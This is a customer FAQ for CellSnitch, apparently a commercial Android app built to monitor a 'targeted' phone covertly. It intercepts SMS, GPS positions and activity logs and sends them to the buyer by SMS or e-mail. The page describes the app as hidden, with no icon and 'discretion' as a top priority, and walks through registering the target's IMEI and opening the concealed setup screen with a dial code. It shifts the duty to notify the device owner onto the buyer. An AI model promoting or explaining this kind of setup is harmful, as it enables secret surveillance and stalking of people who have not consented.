Where can I get CellSnitch?
Right here at CellSnitch.com. The only valid download location for CellSnitch is http://cellsnitch.com/get Any other download location is unauthorized and might be used to host an illegal copy of CellSnitch containing malicious code. Do not trust any other sources unless you see them listed here.
Do your servers receive any of my personal data ?
None of your personal information transits between the targeted device and our servers except for the encoded verification code used for license activation purposes. Any other information that you provide is supplied directly on CellSnitch.com, as part of your customer account creation.
Do your servers receive any of the data being tracked from the targeted handset ?
No. We do not see any of the data being monitored on the targeted handset. The intercepted data is only sent via SMS and/or e-mail to the destinations that you specify in the application settings. At no time does any data from the targeted device transit through our servers.
Then why would I need an account on your site?
The customer account allows you to manage your license(s). CellSnitch licenses are not permanently tied to a particular handset, and as long as you own any number of valid licenses, you can, through your customer account, transfer and activate them in order to run the full version of the application on any device.
In addition to that, your customer account also allows you to access various support documentation and services.
How do I obtain technical support?
Paying customers can reach technical support by e-mail, Skype, or on our technical support forum which you can access from your customer account. We are not always online but will always make ourselves available as quickly as possible to resolve any issues you might have. Only paying customers with valid licenses may benefit from our technical support services.
When contacting support by email or Skype, please be prepared to provide your account email address, license number and the transaction ID of your purchase.
Do I have access to software upgrades?
Yes. You have free access to software upgrades within the same major version. For example, 1.0 users have free access to versions 1.1, 1.2, etc. Paid upgrades to 2.0 will be available at a discount for existing 1.x version users.
Does CellSnitch work on my phone?

Will users know CellSnitch is installed or running?
CellSnitch does not display an application icon whether it is running or not. Discretion is one of CellSnitch's top priorities. As a CellSnitch license owner, you are solely responsible—and in many countries, actually required by law—for notifying the device owner that CellSnitch is running on the device.
Do I need to purchase a license to use CellSnitch?
You can test run CellSnitch for as long as you like without a license.
However, detailed activity logs are not available unless you purchase a license.
How do I create my account?
Much like with any other online merchants, your account is created as part of the purchase process. Start from http://cellsnitch.com/registration/store and simply follow through with your order.
I have purchased a license and created my account. What now?
  • Log into your account.
  • Assuming you have at least one license available, click on 'Register and activate a new device'.
  • Fill-in the form with the IMEI or MEID of the targeted device and press submit.
  • You will be shown a license key, and a dial code to access the CellSnitch setup screen on the device.
  • Use the dialcode to access CellSnitch on the handset, and type the license key into the CellSnitch "About" box.
I am not sure what my IMEI or MEID code is. How to I make sure I have the correct one?
'IMEI's are called 'MEID's on CDMA devices. The MEID on a CDMA device may be alphanumeric.
  • Look in your phone's SettingsAbout PhoneStatus for the IMEI or MEID.
  • Use the code displayed when you dial *#06# on the targeted device.
  • If that does not work, look under the battery of the targeted device. The IMEI is usually displayed there. Galaxy Tabs have the IMEI displayed in fine print on the back of the device.
If you are having trouble finding the IMEI (or MEID) contact our tech support and we will help you locate it.
I am receiving an invalid installation file message when I launch CellSnitch. What's wrong?
The installation file you used to install CellSnitch is not valid. It was not downloaded from our server and might contain malicious code.
Uninstall CellSnitch and start over with a file downloaded at http://cellsnitch.com/get
I am receiving an invalid or expired license message when I launch CellSnitch, but I'm all paid up. What's wrong?
Double check the IMEI or MEID you used to register your license. The IMEI is displayed by dialing *#06# on your device. It is also displayed under the battery on mobile phones and on the back of the device if their is no changeable battery. If one version of the IMEI appears to be different by a few digits, use the IMEI displayed by dialing *#06#. If the problem persists, contact our technical support.
Why are my requested GPS positions not being transmitted?
If both wireless and GPS positioning are turned off on the device, CellSnitch will not turn them on. If only GPS positioning is turned on and you are still not receiving anything, it might be because the device has not been able to get a fix on a geolocation.
Why are activity logs not being transmitted?
Activity logs are transmitted via e-mail at the scheduled time as long as Internet connectivity is available. If Internet connectivity is unavailable for any reason, the logs are forwarded at the next scheduled interval.
How do I remove CellSnitch?
Just choose 'Uninstall' from the CellSnitch settings screen. You will be guided to the Android uninstall interface used for all applications.
Does CellSnitch "root" the targeted device?
Absolutely not. CellSnitch uses capabilities provided in the standard Android SDK.
Are there any compatibility issues or conflicts between CellSnitch and other Android apps?

Task killer apps can cause problems with CellSnitch if they are set up to prevent CellSnitch from running.

Third party SMS apps and SMS apps that use secret boxes can disrupt the reliable interception of incoming SMS.
